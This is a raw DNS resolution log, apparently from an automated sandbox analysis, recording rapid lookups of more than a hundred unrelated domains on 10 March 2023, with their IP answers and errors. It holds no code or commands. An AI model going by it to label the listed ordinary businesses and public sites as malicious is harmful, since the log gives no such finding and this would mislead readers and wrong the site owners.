                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.291666985 CET8.8.8.8192.168.2.60xe4d6Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.340145111 CET8.8.8.8192.168.2.60xc969No error (0)rkengg.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.340145111 CET8.8.8.8192.168.2.60xc969No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.340145111 CET8.8.8.8192.168.2.60xc969No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.340145111 CET8.8.8.8192.168.2.60xc969No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.342500925 CET8.8.8.8192.168.2.60xc898Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.367369890 CET8.8.8.8192.168.2.60xe788No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.374041080 CET8.8.8.8192.168.2.60xb539No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.374041080 CET8.8.8.8192.168.2.60xb539No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.382514954 CET8.8.8.8192.168.2.60xc11cNo error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.392059088 CET8.8.8.8192.168.2.60x3a36No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.456999063 CET8.8.8.8192.168.2.60xee3aNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.456999063 CET8.8.8.8192.168.2.60xee3aNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.490952969 CET8.8.8.8192.168.2.60x7527Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.491523981 CET8.8.8.8192.168.2.60x68f3Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.491796970 CET8.8.8.8192.168.2.60x4744Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.543248892 CET8.8.8.8192.168.2.60xead6No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.543248892 CET8.8.8.8192.168.2.60xead6No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.549592972 CET8.8.8.8192.168.2.60x250bNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.549592972 CET8.8.8.8192.168.2.60x250bNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.550177097 CET8.8.8.8192.168.2.60x996eNo error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.550177097 CET8.8.8.8192.168.2.60x996eNo error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.550754070 CET8.8.8.8192.168.2.60x2b9Name error (3)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.550982952 CET8.8.8.8192.168.2.60x8742No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.551053047 CET8.8.8.8192.168.2.60xa206No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.554320097 CET8.8.8.8192.168.2.60x3052No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.556171894 CET8.8.8.8192.168.2.60x760dNo error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.556171894 CET8.8.8.8192.168.2.60x760dNo error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.573374033 CET8.8.8.8192.168.2.60xc3f3No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.573425055 CET8.8.8.8192.168.2.60x7d70No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.601032972 CET8.8.8.8192.168.2.60x4555No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.608829021 CET8.8.8.8192.168.2.60xa2aaNo error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.629996061 CET8.8.8.8192.168.2.60xf3a7No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.629996061 CET8.8.8.8192.168.2.60xf3a7No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.629996061 CET8.8.8.8192.168.2.60xf3a7No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.629996061 CET8.8.8.8192.168.2.60xf3a7No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.630470037 CET8.8.8.8192.168.2.60xfe42No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.630470037 CET8.8.8.8192.168.2.60xfe42No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.630470037 CET8.8.8.8192.168.2.60xfe42No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.630470037 CET8.8.8.8192.168.2.60xfe42No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.658021927 CET8.8.8.8192.168.2.60x11a1Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.717158079 CET8.8.8.8192.168.2.60x68a5No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.723695993 CET8.8.8.8192.168.2.60x6368No error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.728269100 CET8.8.8.8192.168.2.60x52a4No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.735433102 CET8.8.8.8192.168.2.60xc008No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.736052990 CET8.8.8.8192.168.2.60xa2c9No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.821224928 CET8.8.8.8192.168.2.60x2165No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.821528912 CET8.8.8.8192.168.2.60xca4cNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.833225965 CET8.8.8.8192.168.2.60xd5dfNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.833794117 CET8.8.8.8192.168.2.60x5ca1Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.842060089 CET8.8.8.8192.168.2.60x983eNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.844443083 CET8.8.8.8192.168.2.60xc970Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.856820107 CET8.8.8.8192.168.2.60xb35bNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.857247114 CET8.8.8.8192.168.2.60x174cNo error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.857247114 CET8.8.8.8192.168.2.60x174cNo error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.957786083 CET8.8.8.8192.168.2.60x24daNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.024482012 CET8.8.8.8192.168.2.60xb4adServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.026201010 CET8.8.8.8192.168.2.60x9f07No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.027759075 CET8.8.8.8192.168.2.60x6c1eNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.027759075 CET8.8.8.8192.168.2.60x6c1eNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.027825117 CET8.8.8.8192.168.2.60xb1a3Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.041901112 CET8.8.8.8192.168.2.60x42a2No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.044184923 CET8.8.8.8192.168.2.60xbb2aServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.050909996 CET8.8.8.8192.168.2.60xe53No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.055629015 CET8.8.8.8192.168.2.60x4cfeNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.055629015 CET8.8.8.8192.168.2.60x4cfeNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.067162037 CET8.8.8.8192.168.2.60xdb0fNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.112767935 CET8.8.8.8192.168.2.60xf4e8No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.129575968 CET8.8.8.8192.168.2.60xe606No error (0)rkengg.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.129575968 CET8.8.8.8192.168.2.60xe606No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.129575968 CET8.8.8.8192.168.2.60xe606No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.129575968 CET8.8.8.8192.168.2.60xe606No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.137177944 CET8.8.8.8192.168.2.60x9d9dNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.137748957 CET8.8.8.8192.168.2.60x1b2eName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.165182114 CET8.8.8.8192.168.2.60x6ce4No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.165182114 CET8.8.8.8192.168.2.60x6ce4No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.168661118 CET8.8.8.8192.168.2.60xe53dNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.213314056 CET8.8.8.8192.168.2.60xc61eNo error (0)assideum.com52.219.141.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.224423885 CET8.8.8.8192.168.2.60x19beNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.224423885 CET8.8.8.8192.168.2.60x19beNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.224423885 CET8.8.8.8192.168.2.60x19beNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.231889009 CET8.8.8.8192.168.2.60x465fName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.239988089 CET8.8.8.8192.168.2.60xa8aeNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.241044044 CET8.8.8.8192.168.2.60x95fNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.247354984 CET8.8.8.8192.168.2.60x9256No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.247354984 CET8.8.8.8192.168.2.60x9256No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.275738955 CET8.8.8.8192.168.2.60x55f4No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.279516935 CET8.8.8.8192.168.2.60x6b06No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303133965 CET8.8.8.8192.168.2.60xff06No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.303133965 CET8.8.8.8192.168.2.60xff06No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.304944038 CET8.8.8.8192.168.2.60xd03cNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.304944038 CET8.8.8.8192.168.2.60xd03cNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.309166908 CET8.8.8.8192.168.2.60xc07aNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.310913086 CET8.8.8.8192.168.2.60xa347No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.320617914 CET8.8.8.8192.168.2.60xe281No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.320763111 CET8.8.8.8192.168.2.60x5f58No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.320763111 CET8.8.8.8192.168.2.60x5f58No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.321228981 CET8.8.8.8192.168.2.60xa47No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.322169065 CET8.8.8.8192.168.2.60x27c1No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.322953939 CET8.8.8.8192.168.2.60xbc42No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.322953939 CET8.8.8.8192.168.2.60xbc42No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.325809002 CET8.8.8.8192.168.2.60x8af4No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.327450991 CET8.8.8.8192.168.2.60xee1dNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.327450991 CET8.8.8.8192.168.2.60xee1dNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.327594042 CET8.8.8.8192.168.2.60xd58aNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.328929901 CET8.8.8.8192.168.2.60x5805No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.329155922 CET8.8.8.8192.168.2.60xf150No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.330127001 CET8.8.8.8192.168.2.60xba73No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.332993031 CET8.8.8.8192.168.2.60xb62No error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.346656084 CET8.8.8.8192.168.2.60xbcd7No error (0)vivastay.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.346656084 CET8.8.8.8192.168.2.60xbcd7No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.346656084 CET8.8.8.8192.168.2.60xbcd7No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.346656084 CET8.8.8.8192.168.2.60xbcd7No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.352901936 CET8.8.8.8192.168.2.60xc9bNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.383472919 CET8.8.8.8192.168.2.60xc0cNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.383472919 CET8.8.8.8192.168.2.60xc0cNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.400213957 CET8.8.8.8192.168.2.60xf757No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.401678085 CET8.8.8.8192.168.2.60x5a13No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.406574965 CET8.8.8.8192.168.2.60xb9b0No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.410322905 CET8.8.8.8192.168.2.60x8964No error (0)araax.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.410322905 CET8.8.8.8192.168.2.60x8964No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.410322905 CET8.8.8.8192.168.2.60x8964No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.410322905 CET8.8.8.8192.168.2.60x8964No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.411072969 CET8.8.8.8192.168.2.60xe67eNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.420732021 CET8.8.8.8192.168.2.60x7695No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.432100058 CET8.8.8.8192.168.2.60x8883No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.438869953 CET8.8.8.8192.168.2.60xe39aNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.461352110 CET8.8.8.8192.168.2.60xcc32No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.470865965 CET8.8.8.8192.168.2.60x8df5No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.497330904 CET8.8.8.8192.168.2.60xc266No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.508764029 CET8.8.8.8192.168.2.60x7096No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.508764029 CET8.8.8.8192.168.2.60x7096No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.535455942 CET8.8.8.8192.168.2.60xdccNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.550803900 CET8.8.8.8192.168.2.60xb968No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.568701982 CET8.8.8.8192.168.2.60x16cdNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.568701982 CET8.8.8.8192.168.2.60x16cdNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.577626944 CET8.8.8.8192.168.2.60xa595No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.577626944 CET8.8.8.8192.168.2.60xa595No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.580586910 CET8.8.8.8192.168.2.60xe3bdNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.592070103 CET8.8.8.8192.168.2.60x51c5No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.606408119 CET8.8.8.8192.168.2.60x88d7No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.624628067 CET8.8.8.8192.168.2.60xb9b8No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.624628067 CET8.8.8.8192.168.2.60xb9b8No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.624628067 CET8.8.8.8192.168.2.60xb9b8No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.624628067 CET8.8.8.8192.168.2.60xb9b8No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.667236090 CET8.8.8.8192.168.2.60xe705No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.677496910 CET8.8.8.8192.168.2.60x9404No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.722764969 CET8.8.8.8192.168.2.60xfe14No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.724904060 CET8.8.8.8192.168.2.60x629bNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.727329969 CET8.8.8.8192.168.2.60xf8ebNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.730473042 CET8.8.8.8192.168.2.60x2d11No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.731350899 CET8.8.8.8192.168.2.60x9ac3No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.733067036 CET8.8.8.8192.168.2.60x4674No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.734281063 CET8.8.8.8192.168.2.60xf81bNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.734306097 CET8.8.8.8192.168.2.60x2c8dNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.734539986 CET8.8.8.8192.168.2.60xfb02No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.734539986 CET8.8.8.8192.168.2.60xfb02No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.737521887 CET8.8.8.8192.168.2.60x1e68No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
